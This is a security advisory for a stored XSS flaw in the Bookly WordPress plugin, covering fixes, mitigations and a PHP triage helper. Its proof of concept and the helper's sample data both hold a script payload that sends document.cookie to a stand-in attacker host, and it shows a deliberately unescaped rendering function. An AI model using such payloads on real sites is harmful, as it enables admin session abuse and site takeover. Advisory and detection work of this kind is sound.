Overview
A stored cross-site scripting (XSS) vulnerability has been identified in the Bookly — Online Scheduling and Appointment Booking System plugin for WordPress. Tracked as CVE-2026-5513 with a CVSS 3.1 base score of 7.2 (High), the flaw affects all versions up to and including 27.2.
The vulnerability stems from insufficient sanitization of the bookly-customer-full-name cookie value when it is accepted, combined with missing output escaping when that value is later rendered in the admin interface.
Technical Details
| Field | Value |
|---|---|
| CVE ID | CVE-2026-5513 |
| CVSS Score | 7.2 (High) |
| Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N |
| CWE | CWE-79 (Improper Neutralization of Input During Web Page Generation) |
| Affected Software | Bookly WordPress Plugin |
| Affected Versions | 27.2 and earlier |
| Attack Vector | Network |
| Privileges Required | None |
| User Interaction | None |
| Published | June 13, 2026 |
Vulnerability Mechanics
The Bookly plugin stores user-supplied values — including a customer full name — inside the bookly-customer-full-name cookie during the booking process. When an administrator subsequently views booking records or customer lists in the WordPress admin dashboard, the plugin renders this cookie-derived value without proper escaping.
Because the cookie is sent by the client, an unauthenticated attacker controls it outright: a single booking request carrying a crafted Cookie header is enough to plant a JavaScript payload in the stored customer data. When an administrator later views the affected page, the script runs in the context of the admin session, enabling:
- Session abuse: acting through the admin's live session, or exfiltrating cookies that lack the HttpOnly flag (WordPress sets its own authentication cookies with HttpOnly, so a realistic payload uses the session rather than stealing it)
- Credential theft: injecting a fake login form into the admin page
- Backdoor installation: using the admin's authenticated session and nonces to create a new administrator account or edit plugin and theme files, or redirecting the admin to attacker-controlled pages
- Site defacement: modifying page content dynamically
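The pattern described above, reconstructed as an added example. This is illustrative PHP written for this page, not Bookly's own code: the cookie name comes from the advisory, but the storage via a WordPress option and the function names are stand-ins for the plugin's customer table and rendering code. The second half shows the two fixes a WordPress developer would apply, sanitizing on input and escaping on output.

```php
<?php
// Illustrative reconstruction of the bug class, not Bookly's own code.
// The cookie name is from the advisory; the option key and function
// names are hypothetical stand-ins for the plugin's real storage and views.

// --- Vulnerable pattern: cookie copied to storage and echoed unescaped ---
function vuln_store_customer_name_from_cookie() {
    if ( isset( $_COOKIE['bookly-customer-full-name'] ) ) {
        // Raw cookie value persisted as-is: no sanitization at all.
        update_option( 'demo_last_customer_name', $_COOKIE['bookly-customer-full-name'] );
    }
}

function vuln_render_customer_name() {
    $name = get_option( 'demo_last_customer_name', '' );
    // Concatenated straight into admin HTML: a <script> in $name executes
    // in the browser of whichever administrator loads this screen.
    echo '<td class="customer-name">' . $name . '</td>';
}

// --- Hardened pattern: sanitize on input, escape on output ---
function safe_store_customer_name_from_cookie() {
    if ( ! isset( $_COOKIE['bookly-customer-full-name'] ) ) {
        return;
    }
    // wp_unslash() removes the slashes WordPress adds to superglobals;
    // sanitize_text_field() strips tags, invalid UTF-8 and line breaks.
    $name = sanitize_text_field( wp_unslash( $_COOKIE['bookly-customer-full-name'] ) );
    // A real name never needs hundreds of characters; cap it (assumed limit).
    $name = mb_substr( $name, 0, 128 );
    update_option( 'demo_last_customer_name', $name );
}

function safe_render_customer_name() {
    $name = get_option( 'demo_last_customer_name', '' );
    // Escape at the point of output regardless of what was stored:
    // esc_html() converts < > & " ' to entities, so markup renders as text.
    echo '<td class="customer-name">' . esc_html( $name ) . '</td>';
}
```

Output escaping is the control that actually closes the hole: even if a payload reached the database through some other path, esc_html() renders it as visible text rather than executable markup. Input sanitization is defence in depth and keeps the stored data clean for other consumers such as exports and e-mails.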
Affected Components
- bookly-customer-full-name cookie parameter (unauthenticated input)
- Admin-side rendering of customer booking data
Proof of Concept
An attacker can trigger the vulnerability by submitting a booking request whose Cookie header carries the payload. The value must avoid a literal semicolon, which the server's cookie parser treats as a delimiter; percent-encoding it is sufficient because PHP URL-decodes cookie values.

```http
Cookie: bookly-customer-full-name=<script>document.location='https://attacker.example/steal?c='+document.cookie</script>
```
When the WordPress administrator navigates to the Bookly customer management panel, the injected script executes in their browser session.
Remediation
Immediate Actions
- Update Bookly to a patched version above 27.2 as soon as the vendor releases a fix
- Monitor WordPress admin access logs for unusual activity, in particular new administrator accounts or plugin and theme file edits you did not make
- Review existing booking records for customer names containing HTML tags, event handlers or javascript: URIs; a payload may already be stored and waiting for the next admin page view
- Enable a Web Application Firewall (WAF) rule to block XSS payloads in cookie headers, treating it as a stopgap only, since filters on a free-form cookie value are easy to bypass with encoding
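A triage helper for the record review above, added here as an example and not part of Bookly or the advisory. It is plain PHP with no WordPress dependency so it can run against an export; the rows below are constructed, and the real table and column names are not assumed because they vary by plugin version. The checks decode percent- and entity-encoded input first, which is the common way a payload hides from a naive search for the literal string `<script>`.

```php
<?php
// Added triage helper, not part of Bookly or the advisory.
// Flags customer names that look like injected markup rather than names.

/**
 * Return the reasons a stored name looks like an injection attempt,
 * or an empty array if it looks like an ordinary name.
 */
function suspicious_name_reasons( string $name ): array {
    $reasons = [];
    // Normalise first so "%3Cscript%3E" and "&lt;script&gt;" are both caught.
    $decoded = html_entity_decode( rawurldecode( $name ), ENT_QUOTES | ENT_HTML5, 'UTF-8' );
    $checks  = [
        'html tag'            => '/<\s*\/?\s*[a-z!][^>]*>/i',
        'event handler'       => '/\bon[a-z]+\s*=/i',
        'javascript: URI'     => '/javascript\s*:/i',
        'data: URI'           => '/data\s*:\s*text\/html/i',
        'template expression' => '/\$\{|\{\{/',
    ];
    foreach ( $checks as $label => $pattern ) {
        if ( preg_match( $pattern, $decoded ) ) {
            $reasons[] = $label;
        }
    }
    // Length is a weak but useful signal: real names are short (assumed cap).
    if ( mb_strlen( $decoded ) > 128 ) {
        $reasons[] = 'unusually long';
    }
    return $reasons;
}

// Constructed sample export: customer id => stored full name.
$sample_rows = [
    101 => 'Ada Lovelace',
    102 => "O'Brien, Séamus",
    103 => '<script>document.location=\'https://attacker.example/steal?c=\'+document.cookie</script>',
    104 => '&lt;img src=x onerror=alert(1)&gt;',
    105 => '%3Csvg%2Fonload%3Dalert%281%29%3E',
];

foreach ( $sample_rows as $id => $name ) {
    $reasons = suspicious_name_reasons( $name );
    if ( $reasons ) {
        printf( "customer %d: FLAGGED (%s): %s\n", $id, implode( ', ', $reasons ), $name );
    }
}
```

Rows 101 and 102 pass, including the apostrophe and accented character that a cruder filter would trip on; rows 103 to 105 are flagged. Flagged entries should be deleted or re-saved through a sanitizing path, not merely hidden, because the stored value will otherwise execute on the next admin view of an unpatched install.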
Mitigation (if patch unavailable)
- Restrict access to the WordPress admin panel by IP allowlist; this shrinks the set of browsers in which a stored payload can fire, but does not remove it
- Implement Content Security Policy (CSP) headers to limit script execution, noting that the policy only helps if it forbids inline scripts, which the WordPress admin relies on heavily, so a strict policy will need testing before it is enforced
- Use a WAF to sanitize incoming cookie values as a temporary filter, not a substitute for the plugin fix
WordPress Site Owners: Next Steps
Sites running Bookly for appointment management should treat this as a priority patch. The unauthenticated attack surface (no login required to exploit) combined with admin-side impact makes this a significant risk for any site accepting public bookings.
Check the Bookly changelog and WordPress Plugin Directory for the patched release, or temporarily disable the plugin until an update is available.